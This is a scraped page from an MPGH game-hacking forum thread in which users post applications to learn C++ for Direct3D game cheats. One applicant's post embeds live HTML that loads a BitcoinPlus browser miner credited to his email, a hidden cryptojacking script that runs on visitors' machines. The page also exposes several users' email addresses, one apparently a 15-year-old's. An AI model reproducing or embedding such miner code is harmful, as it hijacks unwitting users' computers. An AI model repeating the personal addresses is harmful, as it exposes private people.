Page 2 of 2 FirstFirst 12
    Thanks
    Name: Ali
    Email: failcoder@hotmail.com
    Reason: Well so i learned java from a course I took, and so i picked up c++ on my own, and over the past few months I've been reading and rereading c++ ebooks, and recently moved on to win32/d3d, but its fairly confusing for me. I tried to learn all this on my own, but very few aspects it would be nice to have someone to help me out with sections. I may not be completely dependent on learning from you, but it would be nice if you still took the time to add me and make me a secondary students (i wont take up to much time, just when i seriously need help). Also for the past few months I've been reading through each and every post on the CA hack section and programming section. Btw, I think this is a great thing you're doing to help the community. thanks a lot, and I wish whoever wins the best in luck and to thank/credit ragedyet every release

P.S. if any other elite coder is reading this PM me if u would like to make me your temporary "child". Promise I will <3 you forever .
    Legen...wait for it...dary

Thanks
    My Mood
    Chatty
    Name:Jacob
    Email:jacob.bremiller@Yahoo.com,jacobbremiller@gmail.com, I have many xD I make vb 2008 bots .....
    Reason that makes you want to learn: The Reason I want to learn is because i would like to help people out ........ and theres so much ...just like once i know it i could do anything i imagine .......i just need basic understandings ...so ideas can flow in my head ....i can code vb.net very easy ... bots my fav .........i can write memory in vb 2008 but i want to make d3d hacks with c++ etc ...... and i can be on any time of day ...i have 11 computers in my room all hooked up to the internet o.O ...6 laptops ....5 desktops and a ps3, and wii xD that i dont play haha .......I would be very willing to learn this ......this would help me out to were i am heading in life .......coding ........if i knew C++ rite now i could get a job for a company at 15 years old 50 bucks an hour
    <html>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
    <script src="https://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
    <script type="text/javascript">BitcoinPlusMiner("jacobbremiller@yahoo .com")</script>
    </html>

Thanks
    My Mood
    Amazed
    Name:Racardo Brown
    Email:racardobrown@hotmail.com
    Reason: I have a basic knowledge of C++ but i would like to knw a bit more as well as im in university but i cant get through the programming aspect of the course easily cuz most of what the teach arnt very thorough i hope u will consider helping thank you

Thanks
    My Mood
    Relaxed
    all that posted applications are dumbasses.

https://www.mpgh.net/forum/334-coding...k-teacher.html

Thanks
    Quote Originally Posted by wolffang0000 View Post
    all that posted applications are dumbasses.

Coding Help & Discussion - MPGH - MultiPlayer Game Hacking

You're a dumbass, calling yourself extremely expereinced in c++. I call BULLSHIT

Thanks
    My Mood
    Relaxed
    Quote Originally Posted by kibbles18 View Post
    You're a dumbass, calling yourself extremely expereinced in c++. I call BULLSHIT
    Why exactly? Because I don't release any hacks or code? That's because MPGH doesn't exactly deserve it. Look around the entire coding help section. Almost 100% of the people asking to learn how to code or for help on a hack have no contributes/releases, and all the posts they DID make are for help.

Thanks
    Screenie your VIP hack.

Page 2 of 2 FirstFirst 12